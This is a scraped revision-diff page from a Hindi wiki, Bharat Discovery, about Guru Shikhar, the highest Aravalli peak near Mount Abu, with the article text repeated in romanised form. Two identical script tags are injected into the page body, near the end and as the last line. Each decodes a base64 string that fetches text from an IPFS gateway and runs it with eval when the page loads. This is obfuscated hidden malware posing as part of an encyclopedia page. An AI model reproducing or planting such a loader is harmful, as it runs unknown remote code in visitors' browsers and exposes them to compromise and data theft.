Difference between revisions of "गुरु शिखर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (गुरु शिखर माउंट आबू का नाम बदलकर गुरु शिखर कर दिया गया है)
Line 1: Line 1:
[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
+
*[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
 
 
 
*गुरु शिखर [[अरावली पर्वत]] श्रृंखला की सबसे ऊंची चोटी है।  
 
*गुरु शिखर [[अरावली पर्वत]] श्रृंखला की सबसे ऊंची चोटी है।  
 
*गुरु शिखर शहर से 15 किलोमीटर दूर है।  
 
*गुरु शिखर शहर से 15 किलोमीटर दूर है।  
Line 7: Line 6:
 
*शिखर पर एक ऊंची चट्टान है और एक बड़ा-सा प्राचीन घंटा लगा है।  
 
*शिखर पर एक ऊंची चट्टान है और एक बड़ा-सा प्राचीन घंटा लगा है।  
 
*मंदिर से कुछ ही दूरी पर पीतल की घंटी है जो माउंट आबू को देख रहे संतरी का आभास कराती है।  
 
*मंदिर से कुछ ही दूरी पर पीतल की घंटी है जो माउंट आबू को देख रहे संतरी का आभास कराती है।  
*गुरु शिखर से नीचे का दृश्य बहुत की सुंदर दिखाई पड़ता है।
+
*गुरु शिखर से नीचे का दृश्य बहुत की सुंदर दिखाई पड़ता है।<ref>{{cite web |url=http://webvarta.com/script_detail.php?script_id=2906&catid=11 |title=राजस्थान का खूबसूरत और एकमात्र हिल स्टेशन माउंट आबू |accessmonthday=[[13 जून]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=वेब वार्ता |language=[[हिन्दी]] }}</ref>
 +
 
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  
Line 16: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}

Revision as of 11:33, 16 May 2011

  • mauant aboo rajasthan ka ekamatr hil steshan hai. mauant aboo mean anek paryatan sthal haian. inamean kuchh shahar se door haian to kuchh shahar ke asapas hi haian.
  • guru shikhar aravali parvat shrriankhala ki sabase ooanchi choti hai.
  • guru shikhar shahar se 15 kilomitar door hai.
  • guru shikhar se kuchh pahale vishnu bhagavan ke ek roop dattatrey ka mandir hai.
  • mandir ke pas se hi shikhar tak sidhi़yaan bani haian.
  • shikhar par ek ooanchi chattan hai aur ek b da-sa prachin ghanta laga hai.
  • mandir se kuchh hi doori par pital ki ghanti hai jo mauant aboo ko dekh rahe santari ka abhas karati hai.
  • guru shikhar se niche ka drishy bahut ki suandar dikhaee p data hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>